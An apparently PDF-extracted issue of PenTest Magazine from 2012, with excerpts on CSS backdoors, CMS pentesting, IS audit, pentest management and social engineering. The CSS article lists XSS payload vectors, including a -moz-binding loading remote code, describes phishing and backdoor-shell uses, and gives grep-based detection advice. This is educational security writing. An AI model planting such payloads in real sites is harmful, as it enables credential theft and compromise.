CMS Pentesting WebApp Pentesting by PenTestMag

EDITOR’S NOTE Hello Everyone!

Here it is! Next issue of your favorite Web App Pentesting. This was a tough part but done with satisfaction. An now you have it ready for reading and commenting. So let’s see what we have prepared for you. This issue goes with three sections and the next chapter of your favorite cyber crime novel – Cyber Stylleto – by Mike Brennan and Richard Stiennon, the gentlemen continue the story with chapter 5. Firstly, we go with the most important Web App section where you find three articles. Hans-Michael Varbaek will reveal to us a dangerous secrets that could be hidden behind CSS in the article Backdoors Hiding Malicious Payloads Inside Cascading Style Sheets. After reading you really can be more aware of security on web pages and avoiding problems. The next article How to pentest well-known CMS, by Sumedt Jitpukdebodin gives us a view on how to manage easily a webpage with cms and make it simple and safe. It’s surely worh reading. Web App section ends with Daniel Molina Wegener’s article titled Frameworks and Good Design Implementation. He teaches us to choose which framework we should use and what to do to make it even better. Next we go with section Close-Up, in the article entitled Why an Automated Vulnerability Assessment is not Enough Ahmad Taha Zaki presents the most popular techniques that help in pen-testing and proves that basic methods are not enough. He puts a new light on using and abusing wellknown methods. Close-up is completed with Peter Hu’s Managing a Successful Penetration Testing Team. He shares with readers all sorts of misunderstanding people get when they hear about pentesters. You will get four precious tips how to become a good manager of pentesting team. In the Social Engineering section you will find Shane MacDougall’s article Social Engineering Engagements. The author reminds us how dangerous it can be if used in inappropriate way. So it’s good to know how to handle it. it.

We hope you will enjoy reading this as we enjoy making Enjoy reading! Adam Robakiewicz & PenTest Team

04/2012(6)

Page 4

WEB APP

Backdoors Hiding Malicious Payloads Inside Cascading Style Sheets by Hans-Michael Varbaek

When a website gets compromised a new file is often created by the attacker, where he or she can sometimes do almost the same on the system as any other user. On Linux the user used to help the attacker is www-data, which is by default used for serving Apache threads. So it wouldn’t be smart to block that user from the system as the Apache threads spawning from the main process (which is running as root in order to be able to bind to port 80 and / or 443) should never run as root but as an unprivileged user instead.

How to pentest well-known CMS

Frameworks and Good Design Implementation

by Sumedt Jitpukdebodin

Today, a new website is created about every minute. Anybody can be an owner of a website today very easily. Most new websites have the same look,page structure, different colors, only difference is the logo of the website. These entire websites are created with the same CMS. The CMS (Content Management System) is a web application system that has many tools for helping the web master to author content, customization of the theme, administration website, user management, etc.

by Daniel Molina Wegener

A framework is more than a library. We can state that a framework defines a common approach to solve problems using software abstractions with reusable generic functionalities. There are some considerations regarding which framework should be used to reach the optimal solution. We can use any framework that we want, but must think on some elements that are making some frameworks better than others while we are designing our application.

http://pentestmag.com

CONTENTS

CLOSE-UP

Why an Automated Vulnerability Assessment is not Enough by Ahmad Taha Zaki

For the last few years, a concept has grown within the Information Technology (IT) field, that conducting an automated vulnerability assessment, and maybe followed a penetration test is enough to determine and validate vulnerabilities within an information system (IS), thus considering these processes as a full security assessment, within the following lines we will explain the process of an IS Audit and why it is important to be performed side by side with vulnerability assessment and penetration testing.

Managing a Successful Penetration Testing Team by Peter Hu

“You Pentesters are crazy!” Believe it or not, there are numerous negative perceptions surrounding penetration testing teams. enetration testers have long had a bad reputation; they are viewed as techno-geeks, out of touch with the real world and misaligned from real business goals. I hear such complaints on a constant basis.

SOCIAL ENGINEERING

Social Engineering Engagements by Shane MacDougall

REVIEW

SecPoint Penetrator Review by Jimmy Halfpenny

Vulnerability assessment should be a key part to your information security program. It’s important to keep up to date with the everchanging attack surface your network presents and automated scanning can help you keep on top of it. This week I’ve been looking at the Penetrator vulnerability assessment appliance from Secpoint (http://www.secpoint.com/penetrator.html) which offers a simple, straightforward way to scan your systems for remote vulnerabilities.

Betatesters: Denis Distler, Felipe Martins, Rishi Narang, Johan Snyman, Edison Josue Diaz, Aby Rao, Hugo Lujan Senior Consultant/Publisher: Paweł Marciniak CEO: Ewa Dudzic ewa.dudzic@software.com.pl Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl DTP: Ireneusz Pogroszewski

Marketing Director: Ewa Dudzic ewa.dudzic@software.com.pl Publisher: Software Press Sp. z o.o. SK 02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631 www.pentestmag.com Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them. To create graphs and diagrams we used program by

Mathematical formulas created by Design Science MathType™

DISCLAIMER!

CYBER STYLETTO

Editor: Paulina Płocha paulina.plocha@software.com.pl

Production Director: Andrzej Kuca andrzej.kuca@software.com.pl

After years of being neglected, social engineering is finally coming into its own, as companies (and auditors) realize the impact of the threat, and more important, how frequently it is being successfully used by attackers. As a result, more of these engagements are starting to appear on our plates.

TEAM

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Cyber crime novella- Cyber Styletto – Chapter 5 by Mike Brennan and Richard Stiennon

Cyber crime novella- Cyber Styletto – Chapter 4

04/2012(6)

Page 5

http://pentestmag.com

WEB APP

CSS Backdoors Hiding Malicious Payloads Inside Cascading Style Sheets When a website gets compromised a new file is often created by the attacker, where he or she can sometimes do almost the same on the system as any other user. On Linux the user used to help the attacker is www-data, which is by default used for serving Apache threads.

o it wouldn’t be smart to block that user from the system as the Apache threads spawning from the main process (which is running as root in order to be able to bind to port 80 and / or 443) should never run as root but as an unprivileged user instead. Sometime ago, I discovered a couple of persistent (stored) Cross-Site Scripting vulnerabilities in vBulletin [1] [2], where the first was simply found with standard research but also a bit of luck [4] [5], while RSnake’s XSS Cheatsheet [3] was used to aid me in bypassing the custom Anti-XSS filter inside vBulletin. All of this was great, but as I dived deeper into executing JavaScript via CSS (Cascading Style

Figure 1. Screenshot of JavaScript execution inside a CSS �le on vBulletin

04/2012(6)

Sheets), I realized at that time, that attackers, such as knowledgeable script kiddies, or black hats, could hide a JavaScript payload in one of the CSS files. vBulletin uses e.g., over 100 CSS files for each style, and if the CSS changes are stored only inside the database, an unaware administrator may not realize his or her installation of vBulletin has been compromised as they may be unaware of backdoors can hide in CSS.

How to execute JavaScript in CSS

Firstly, it’s important to know how it is possible to even execute JavaScript inside the templates or files, which are essentially the same as they are loaded with the HTML page. There are of course limitations to these backdoors, as the page may not load the entire CSS library at once and therefore, the most appropriate CSS file for infection must be chosen. But how is it possible? (Check Listing 1) In fact, I’m not even sure that I’ve collected most of the known possible ways, but after reading through RSnake’s XSS Cheatsheet [3], and while searching through the Internet I came up with a nice list as seen in Listing 2. As you can see, these are just some of the ways, where most, if not all of them, are mentioned at RSnake’s website. With HTML5 and CSS3, where the latter is the most important in this case, new vectors enabling JavaScript will most likely be possible.

Page 6

http://pentestmag.com

Listing 1. One of many ways to execute JavaScript in CSS width:expression(alert(String.fromCharCode(73,110,116,101, 114,78,48,84)))

Listing 2. A few examples of how JavaScript execution is possible in CSS �les - moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss"); // See ha.ckers.org - url(vbscript:msgbox("X/SS"));

- behavior:url(); // See ha.ckers.org for more information - background:url();

- width:expression();

- @import'vb\script:alert(document.domain); // IE6 - @\!'javascript:alert(/IE6/)'; //IE6

What’s possible with Cross-Site Scripting?

The last is particularly interesting, as the payload abuses the web application functionality that the administrator has access to, and thereby injects a PHP plugin, which returns a backdoor shell to the attacker. In the same way, it is possible to inject this JavaScript payload into CSS files. But let’s say the attacker already has remote code execution but needs a backdoor or wants to know the password of the users. In this case, the attacker can simply use JavaScript to redirect the HTTP-flow of the web application to a phishing page and back again with some clever dynamic editing of the HTML Form Input which quite often uses CSS to, meaning this is an ideal place to inject a backdoor for an attacker. Another backdoor could simply be session riding the hijacked victims and e.g., performing actions on their behalf without them knowing it happened before it’s too late. As the CSS follows the user almost everywhere on the site, in case it is e.g., injected into the header, the impact of the malware aka payload in the CSS files Figure 2. Reverse TCP Connection was made from the webserver to the can be quite fatal for a website.

Only your imagination sets the limits and of course the capabilities of your browser, the target web application, and your patience. It is possible to even scan your internal network [7], but also in some cases without being a privileged user, escalate privileges to remote code execution [6].

attacker

How do you find these backdoors, or know they’re there?

Figure 3. Redirecting the user to a browser exploit with JavaScript inside CSS

04/2012(6)

This is the big question, but the easiest way is simply to look with a simple regular expression tool that searches for e.g., occurrences of width:expression. Keep in mind some legit web applications; actually use JavaScript in their CSS files already. So don’t delete anything unnecessary unless you want a broken style on your website (vBulletin is one of these applications). On Linux you can use something as simple as ‘grep’, and on Windows there’s a nice program called WinGrep, that even has a GUI to make everything a bit easier. The problem with backdoors in CSS files is that some web applications such as vBulletin has around Page 7

http://pentestmag.com

WEB APP References

[1] http://forum.intern0t.org/intern0t-advisories/3349-vbulletin-4-0-8-persistent-cross-site-scripting-via-pro�le-customization.html [2] http://forum.intern0t.org/intern0t-advisories/3398-vbulletin-4-0-8-pl1-cross-site-scripting-�lter-bypass-within-pro�le-customization.html [3] http://ha.ckers.org/xss.html [4] http://www.exploit-db.com/vbulletin-a-journey-into-0day-exploitation/ [5] http://www.youtube.com/watch?v=LOcLFVAqgOU [6] http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/ [7] http://www.businessinfo.co.uk/labs/css_lan_scan/css_lan_scanner.php

750’000 letters of CSS and reading through that is quite challenging to keep a focus on. If your web application only uses static CSS files that are not stored in a database, then simply doing a “diff” (differentiate) of the original and the latest backup, can often reveal many interesting things in case an attack has occurred. Of course, if the hacker managed to “rm –rf” (delete) everything, this is not possible but then you could for example, change the ownership of the files to root, and make root able to write to these files and even write-protect them with ‘chattr’. If you change the owner to root, make sure the guests visiting the website have the right (chmod) permissions to access the files.

We haven’t seen it yet on a wide scale yet, so why discuss this issue?

With these drive-by aka exploit kit injections happening widely on a periodic basis, using simple <iframe> injections, they could easily turn into an extra CSS entry that looks harmless and may not execute the malicious all of the time, and thereby, stay hidden for much longer time. After all, when you check if a website has been compromised, the first thing most would check is the HTML source. If it looks clean, one would most likely move on. But a backdoor could be hiding in those 5k lines of CSS somewhere. Since time is precious, most skip this part as it is “unlikely” for backdoors to exist there, at least from some points of views most likely. The most important thing when assessing the state of a web application is to go through everything. u

It’s important to be aware of the tricks black hats may think of using or are using but the public may not generally know about. It’s impossible to tell how many times this method may have been used already, but it is one of the more stealthy ways. If the attacker doesn’t put a huge payload in the CSS files, but instead load an external CSS file instead, or use several variables across a 5’000 line long style sheet to create a payload that phishes the login credentials and that is even if the attacker hasn’t changed the actual HTML form, because with dynamic JavaScript it is possible to change a HTML page after it has been loaded.

HANSMICHAEL

Figure 4. Demonstration of an old vulnerability in conjunction with the redirection attack

Hans-Michael Varbaek has been in the hacking community for a little over 10 years, though with shorter and longer breaks from time to time. He has mostly worked within Technical Support, abroad in both Sweden and Ireland, but has also worked as a freelance penetration tester, where most of his work has been voluntary. He administrates the InterN0T site and community, �nds 0days and writes advisories for fun but no pro�t whenever there’s time and blogs at The Exploit Database on rare occasion. Currently he’s sorting out the last things before moving to Australia, while sharing his knowledge and ideas with the community whenever possible.

04/2012(6)

Page 8

http://pentestmag.com

smart security interface© the multiplatform security connector integrated with all major PKI applications and TMS platforms; it fully supports all wide spread smart cards and architectures for government, corporate and bank projects; it also interfaces with smart phones, pre-boot systems and TPM

iEnigma® the software application that turns your smart phone into a PKI smart card; unparalleled convenience for digital identity management; unbeatable security thanks to the support of NFC chips and micro SD cards

plug´n´crypt® the product line for logical and physical access control covering different form factors: USB token, smart card, micro SD card, soft token, also in combination ��

CSTC® PKI made simple and accessible to SMB: card initialization, management of �� TMS infrastructure

contact: team@charismathics.com

www.charismathics.com

WEB APP

How to pentest well-known CMS Today, a new website is created about every minute. Anybody can be an owner of a website today very easily. Most new websites have the same look,page structure, different colors, only difference is the logo of the website.

hese entire websites are created with the same CMS. The CMS (Content Management System) is a web application system that has many tools for helping the web master to author content, customization of the theme, administration website, user management, etc. Although, the web master does not understand anything about web programming, he can still create a beautiful or nice websites because CMS is managed via a web interface. The web master can add a new feature to CMS by installing a new plugin. A web master just has to click, click and click, then valla! the new website has been created. The coin has 2 sides, the bad side is if someone can find a vulnerability in the core of the CMS or well-known plugin, he can then hack all websites that used the vulnerable CMS or vulnerable plugin too. In this article, I will discuss how to pentest 3 well-known

CMS: Joomla, Drupal and Wordpress. This tutorial will show you how to get the information for the common CMS websites and how to pentest them.

Figure 1. Example administrator page of Joomla (http:// 192.168.253.128/1/administrator/)

Figure 2. Example administrator page of Wordpress (http:// 192.168.253.128/3/wp-login.php)

04/2012(6)

Identify the web

First thing we must know before pentesting the website is what CMS was used? Because each CMS has different default files or structure. All these different things create the signature of each CMS. We can analyze the target website with the following 2 methods.

By manual testing

Normally, when a user installed CMS is complete, he often forgets to remove unnecessary files from the website. Those files will be the signature of the CMS and default configurations will let us know what CMS was used.

Page 10

http://pentestmag.com

ITOnlinelearning offers Network Security courses for the beginner through to the professional. From the CompTIA Security+ through to CISSP, Cer�fied Ethical Hacker (CEH), Cer�fied Hacking Forensic Inves�gator (CHFI) and Security Analyst/Licensed Penetra�on tester (ECSA/LPT).

Tailored Advice and Discounts 0800-160-1161 or Please Call one of our Course Advisors for help and Tailored Advice -during office hours (Mon-Fri 9am-5.30pm)

Telephone: 0800-160-1161 Interna�onal: +44 1795 436969 Email: sales@itonlinelearning.co.uk support@itonlinelearning.co.uk Registered Office: 16 Rose Walk, Si�ngbourne, Kent, ME10 4EW

WEB APP

Frameworks and Good Design Implementation

e can use any framework that we want, but must think on some elements that are making some frameworks better than others while we are designing our application. From this perspective, a framework will reduce your development time-line, but not at all, still it requires a good work, and a good work requires time and effort. You can find many solutions in a framework, like input validation and message processing, but still it requires a good architecture implementation. A framework itself is not enough to cover a development. It requires a good application design, thinking on scalable applications from the start. We must think on application designs that can scale easily, we can cover that requirement using the proper architectural patterns and design patterns. Any class provided by the framework should not be used as is, we must plug each class in a design pattern properly, to make it fit a good architecture. We should have in mind few questions about the framework that we will start using, as follows: • • •

What is the predefined architectural pattern that covers the framework? How easy is to extend that pattern to other patterns to cover abstractions? Is easy to integrate it with third party technologies like Message Queues and Job Queues? 04/2012(6)

• • •

Does it supports a wide variety of data formats to expose application data, like REST, XML and JSON? Can we scale the application using this framework? Can we plug third party APIs, like OAuth authenticated APIs?

Also we should ask «How much do you think that will grow the application?» And then we can start thinking on the main architectural pattern that should be used, where an architectural pattern is defined in terms of components, like the Model View Controller pattern and the Presentation Abstraction Control pattern. On small applications, patterns like MVC should be preferred, but on larger applications, patterns like PAC should be our first preference, due to its flexible design. On the PAC pattern we have the option of layering the application allowing more complex design patterns to be included on it, where a design pattern is defined in terms of classes. The PAC pattern allows layering applications, which is very important on larger applications. If the application grows, its design can be migrated easily to distributed computing components, like services APIs, Message Queues, Job Queues and similar stuff. If you do not have a well defined structure, using the proper layers, the fact that will be harder to refactor your application to make it grow faster, increasing the project development

Page 14

http://pentestmag.com

CLOSE-UP

Why an Automated Vulnerability Assessment is not Enough

lthough IS audit usually depends upon certain checklist, but it incorporates the use of various systems’ reports, user interface, and sometimes, with respect to the experience of the auditor, upon the business logic and the need-to-know principle. An assessment including only automated vulnerability assessment and penetration testing can detect weak passwords but can’t inform us whether the account holder needs the rights she currently has or not, it can detect un-patched services but can’t inform us whether these services are authorized to be there in the first place or not, it can detect misconfiguration of some firewall rules, but can’t inform us about its correct complete rule set. So what we really need is a holistic approach that can detect/validate vulnerabilities besides determine whether or not this very specific system comply with the entity’s information security policy, in this case an IS audit needs to be added to our set of activities to perform a complete security assessment. We won’t be discussing vulnerability assessment and penetration testing within the rest of this article, and we will rather focus upon the IS audit process. Let’s start describing the IS Audit process from the very beginning, it is the process of collecting and evaluating evidence to determine whether a computer system (information system) safeguards assets, 04/2012(6)

maintains data integrity, achieves organizational goals effectively and consumes resources efficiently [1]. It also provides management with a proper validation of the effectiveness of current controls of an IS. Any information system can be modeled into four functional parts; Input, Processing, Output and Storage (IPO+S): Figure 1. Any organization’s management should manage to have efficient controls in place with regard to each part of this functional model.

Figure 1. Information System Functional Model

Page 20

http://pentestmag.com

��

CLOSE-UP

Managing a Successful Penetration Testing Team A Five Minutes Crash Course

“You Pentesters are crazy!” Believe it or not, there are numerous negative perceptions surrounding penetration testing teams. Penetration testers have long had a bad reputation; they are viewed as techno-geeks, out of touch with the real world and misaligned from real business goals. I hear such complaints on a constant basis.

nfortunately, in many cases the perception does become the reality for our customers. Instead of viewing penetration testers in a positive light, their sense of reality becomes overshadowed by their own negative perceptions. As someone with leadership responsibility for a penetration testing team, it is our job to positively alter that perception. There are numerous resources online, in books and classrooms on developing a penetration testing program, but I have not seen too many resources on how to become a manager of this program. In this article, I will share a few tips that I have learned through experience and, more importantly, through mentors that have guided me through the process of becoming a manager of a successful penetration testing team. Like most new IT managers, my own promotion into the management position was not any different than a promotion in most other areas of information technology. The promotion was based more on my technical capabilities and accomplishments, with very little consideration for my actual business acumen. As a new manager of this incredibly technical program, I quickly became overwhelmed and started losing myself in mundane technical irregularities rather than being focusing myself on being manger. It was easy to overlook some of the basic business practices and 04/2012(6)

lose focus when one does not take a step back and ask the following: What is the goal of this job? Who are the stake holders? How do we add value? When new managers are dropped into leadership positions, I believe they really need a crash course to shift their concentration from a technical standpoint to a business value focus. Remember, business drives IT. Here are four tips that will surely help any manager regardless of experience.

Tip Number One

First and foremost, a manager must understand that the penetration testing team must add value. A manager needs to understand the customer’s business, and make every effort to learn what they do. Successful managers will be able to communicate to their customers’ in their language. For example, is the customer in the business of power generation? Or is it health care that they provide? Or is it the financial industry where time is money and money is time? Each business has their own unique requirements and lingoes; being able to understand what your customer is looking from a business need point of view is very important. The ability to communicate their requirements and penetration testing in your customer’s language will add impact to your statement allowing you to win trust, cooperation and respect.

Page 26

http://pentestmag.com

SOCIAL ENGINEERING

Social Engineering Engagements Beware of The Pitfalls After years of being neglected, social engineering is finally coming into its own, as companies (and auditors) realize the impact of the threat, and more important, how frequently it is being successfully used by attackers. As a result, more of these engagements are starting to appear on our plates.

ut it’s very important that auditors know exactly what they are getting into before they embark on a social engineering engagement, both to ensure the audit’s efficacy, as well as to prevent blowback from dissatisfied or angered clients. I was recently speaking with a colleague who had just come back from an engagement, and he ruefully recounted his client’s demand for a significant refund as a result of a social engineering gig that the auditor thought had gone well, but the client didn’t. What happened? Well the auditor had run a well-known phishing tool, had several employees at the target company click on the supplied links, and had in turn installed (harmless) software on the “victim’s” machines. So why was the client unhappy? There were two issues: the client hadn’t been aware that software would be deployed on the machines (harmless or not), and the client didn’t believe that phishing was social engineering (a stance I actually agree with). Some simple ground rules set out prior to the engagement’s commencement would have helped avoid this ugly scene. So today we will set out some points that every social engineering engagement manager should look for before embarking down that potentially pitfall-filled road. While this might seem pretty straightforward, I’m amazed at the number of times I’ve heard colleagues run into problems with this. The same people who 04/2012(6)

judiciously mark out what’s fair game for a network penetration test, somehow fail to apply the same standard to social engineering engagements.

Ground Rules

It’s critical that the client and auditor agree to some basic ground rules before the first phone call is made or phishing email is sent: • • • •

• • • •

What pretexts will be used? Who can be targeted? Can they be targeted at home? Can they be targeted online at non-work sites? (especially critical since I have had success in targeting individuals through dating sites – a potential minefield) What data will be targeted? Will on-site attacks be performed? Will phone attacks be used Are vendors fair game

Any social engineering pretext that has the potential to induce fear, needs to be vetted before being used. If you are calling posing as a security team member, and are telling your target that there has been a breach and you need them to change their password, there’s a very high risk that your victim will tell others within the company about the incident. Imagine if your target

Page 28

http://pentestmag.com

REVIEW

SecPoint Penetrator Review Vulnerability assessment should be a key part to your information security program. It’s important to keep up to date with the ever-changing attack surface your network presents and automated scanning can help you keep on top of it. This week I’ve been looking at the Penetrator vulnerability assessment appliance from Secpoint (http:// www.secpoint.com/penetrator.html) which offers a simple, straightforward way to scan your systems for remote vulnerabilities. The Penetrator is available in several flavours, chiefly as a hardware appliance or as a VMware virtual machine. There’s also an option to buy the software-only product. Pricing is based on the number of IP addresses that can be scanned concurrently. The starting price for the appliance is $2,025.00 for

an 8 concurrent IP address license and $675.00 for the VMWare virtual appliance with 4 IP addresses. You can change addresses being scanned as often as you wish so it’s good for consultants with multiple customers or companies with a larger block of addresses to scan and smaller budgets. I’ve been looking at the Penetrator S600 which is good for 16 concurrent IP addresses.

SecPoint Penetrator Appliance

Once you plug in the appliance and power in a few minutes the device is ready to go. Log in to the web interface with your browser and you’re presented with a dashboard showing some quick links to commonly used functionality, a list of the previous audit scans and the status of the appliance. The Penetrator has a database of over 54,000 remote vulnerabilities and security issues.

Secpoint Dashboard 04/2012(6)

Page 32

http://pentestmag.com

CYBER STYLETTO

Cyber Styletto 4p.m., Thursday, offices of Ryan Repo Services, San Francisco

B ��

uck Ryan made boxcars full of money repossessing aircraft whose buyers were in �� default. The glamorous sounding business, �� though, �� meant spending hours in dark and dirty locations, �� and �� waiting, watching drinking gallons��of bad coffee, �� poised for the right opportunity to move. So when it came �� to spending that�� money,��Buck made up �� for �� the rough �� trips by making sure his accommodations back home were designed to �� be luxury that rivaled a sultan’s. His �� conference room in �� the Pyramid seated twenty at a table �� the size of a landing�� strip. The suite was all�� windows �� except for the interior walls, which were covered with �� photos of the planes Buck had snatched in his quarter �� century in business. Looking out, Yvonne took views �� in �� of the bay, the Golden Gate �� and the rest of the city. ��

“Impressive,” Yvonne said. “This is a nice upgrade from your last office.” “Wish I spent more time here,” Buck said, “but the money’s out there.” �� “This is like�� an �� aircraft archive,” Colin said as he �� perused the pictures. He stopped in front of a �� Nam-era �� F-4. “You fly this one too?” ��

��

�� “Flown them all. �� But�� the�� Phantom’s the only one I �� could do barrel rolls in,” Buck said.

They sat at the end of the table closest to the bridge, leaving vacant a space that resembled a small hangar. Yvonne looked into the cavernous area and asked, “Expecting more guests?” “I’ve got that muscle you asked for,” Buck said, “But actually no one’s sat at the other end of the table since I can remember. Guess I got a little carried away with the decorating. But I’ve got to spend my money someplace.” 04/2012(6)

There was a barely audible knock at the door to the conference room. A shaved head poked in, apologized for the interruption and smiled. “Come on in, boys,” Buck said. The head and its owner had to turn a little sideways to get through the door. The man was his own jumbo jet, maybe six-seven and at least three hundred pounds. How he’d managed to knock so lightly was a mystery.

Page 34

http://pentestmag.com

In the upcoming issue of the

Android Web Applications Available to download on May 22th

If you would like to contact PenTest team, just send an email to maciej.kozuszek@software.com.pl or ewa.dudzic@software.com.pl . We will reply a.s.a.p. PenTest Magazine has a rights to change the content of the next Magazine Edition.